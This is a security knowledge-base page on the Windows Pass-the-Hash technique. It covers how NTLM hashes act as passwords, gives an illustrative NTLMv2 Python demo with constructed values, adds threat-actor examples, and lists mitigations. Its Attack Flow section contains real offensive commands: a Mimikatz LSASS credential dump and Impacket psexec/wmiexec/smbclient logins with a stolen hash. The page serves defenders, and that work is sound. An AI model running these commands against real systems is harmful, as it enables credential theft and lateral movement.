Pass-the-Hash (PtH)
Status: Scaffold — content in progress
ATT&CK: T1550.002 — Use Alternate Authentication Material: Pass the Hash
Platforms: Windows
Severity: Critical
What It Exploits
NTLM authentication never transmits the password: the client answers the server's challenge with a value keyed by the NT hash of the password, and the verifier checks it using the same stored hash. Anyone holding the NT hash can therefore produce a valid response and authenticate as that user without knowing the password, which makes the hash password-equivalent.
Sources of NTLM hashes:
- LSASS memory dump (Mimikatz, pypykatz)
- NTDS.dit extraction (DCSync, volume shadow copy)
- Local SAM database (local account hashes)
- Impacket secretsdump.py (remote extraction of SAM, LSA secrets and NTDS.dit)
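As an added illustration of the point above (example code written for this page, not from the original or from any of the tools it names): the NTLMv2 challenge-response from MS-NLMP, with the client and verifier sides computed from the same 16-byte NT hash. The hash, user, domain, challenges and target info are constructed values; a real NT hash is MD4 of the UTF-16LE password, which is deliberately not computed here because the password never enters the exchange. The three checks show that the hash alone authenticates, a wrong hash is rejected, and a captured response cannot be replayed under a new challenge, so the secret that the mitigations below must protect is the hash itself.

```python
import hashlib
import hmac
import struct

# Constructed NT hash for the demonstration. In practice this is MD4(UTF-16LE(password));
# the password itself is never needed below, which is the whole point of Pass-the-Hash.
NT_HASH = bytes.fromhex("0123456789abcdef0123456789abcdef")
USER = "alice"      # constructed
DOMAIN = "CORP"     # constructed

# Constructed server-side target info (AV_PAIR list): MsvAvNbDomainName = "CORP", then MsvAvEOL.
TARGET_INFO = (
    struct.pack("<HH", 0x0002, 8) + "CORP".encode("utf-16-le")
    + struct.pack("<HH", 0x0000, 0)
)


def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """MS-NLMP NTOWFv2: HMAC-MD5 keyed with the NT hash over UTF-16LE(UPPER(user) + domain)."""
    data = (user.upper() + domain).encode("utf-16-le")
    return hmac.new(nt_hash, data, hashlib.md5).digest()


def ntlmv2_response(nt_hash, user, domain, server_challenge, client_challenge, timestamp, target_info):
    """Client side: build the NTLMv2 NtChallengeResponse = NTProofStr || blob (MS-NLMP 3.3.2)."""
    blob = (
        b"\x01\x01"                        # RespType, HiRespType
        + b"\x00" * 6                      # reserved
        + struct.pack("<Q", timestamp)     # FILETIME
        + client_challenge                 # 8-byte client nonce
        + b"\x00" * 4                      # reserved
        + target_info
        + b"\x00" * 4                      # reserved
    )
    key = ntowf_v2(nt_hash, user, domain)
    nt_proof = hmac.new(key, server_challenge + blob, hashlib.md5).digest()
    return nt_proof + blob


def verify_ntlmv2(stored_nt_hash, user, domain, server_challenge, response):
    """Verifier side (DC or local SAM): recompute NTProofStr from the stored NT hash only."""
    nt_proof, blob = response[:16], response[16:]
    key = ntowf_v2(stored_nt_hash, user, domain)
    expected = hmac.new(key, server_challenge + blob, hashlib.md5).digest()
    return hmac.compare_digest(nt_proof, expected)


def demo():
    """Run the exchange once and report what the verifier accepts and rejects."""
    server_challenge = bytes.fromhex("1122334455667788")   # constructed
    client_challenge = bytes.fromhex("8877665544332211")   # constructed
    timestamp = 0x01D9C0DE00000000                         # constructed FILETIME
    response = ntlmv2_response(NT_HASH, USER, DOMAIN, server_challenge,
                               client_challenge, timestamp, TARGET_INFO)
    return {
        # Holding only the NT hash is enough to produce a response the verifier accepts.
        "hash_only_authenticates": verify_ntlmv2(NT_HASH, USER, DOMAIN, server_challenge, response),
        # A different hash (wrong credential) is rejected.
        "wrong_hash_rejected": not verify_ntlmv2(bytes(16), USER, DOMAIN, server_challenge, response),
        # The response cannot be replayed under a fresh challenge: the reusable secret is the hash.
        "response_replay_rejected": not verify_ntlmv2(
            NT_HASH, USER, DOMAIN, bytes.fromhex("ffffffffffffffff"), response),
    }


if __name__ == "__main__":
    for check, ok in demo().items():
        print(f"{check}: {ok}")
```

The verifier function holds no password, only the stored hash, which is why every hash source in the list above yields a working credential and why the mitigations focus on keeping the hash out of reach (Credential Guard) or refusing NTLM for sensitive accounts (Protected Users).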
Attack Flow
1. Dump the NTLM hash (example: from LSASS)

```
mimikatz# sekurlsa::logonpasswords
```

2. Authenticate with the hash (Impacket examples; `-hashes` takes `LMhash:NThash`, so an empty LM half leaves the leading colon)

```sh
# SMB (file share access)
smbclient.py -hashes :NTLMhash domain/Administrator@target
# Remote execution
psexec.py -hashes :NTLMhash domain/Administrator@target
# WMI
wmiexec.py -hashes :NTLMhash domain/Administrator@target
```
Conditions Required
- NTLM authentication enabled on the target
- Possession of the target user's NTLM hash
- Target system accepts remote authentication (SMB reachable, WMI accessible)
CTI Examples
Pass-the-Hash is one of the most widely used lateral movement techniques across all threat actor categories.
APT28 (Fancy Bear): documented use of Mimikatz + PtH in multiple intrusions targeting government and defense.
Evidence label: Reported | Confidence: High | Source reliability: B2
Ransomware operators (LockBit, BlackCat, Conti): PtH is a standard step in the encryption chain after initial foothold.
Evidence label: Observed | Confidence: High | Source reliability: A1
Mitigations
- Credential Guard: isolates NTLM hashes from the normal LSASS process by keeping them in a virtualization-based isolated LSA process, so a memory dump of LSASS does not yield them
- Protected Users group: members cannot authenticate with NTLM, so a stolen hash for such an account is not usable
- Restrict remote SAM queries (limit which accounts may connect to the SAM remotely)
- Local Administrator Password Solution (LAPS): unique local admin password per machine, so one local admin hash does not open every host
Cross-Links
| Topic | Link |
|---|---|
| NTLM Protocol | ntlm |
| Detection | detect-pass-the-hash |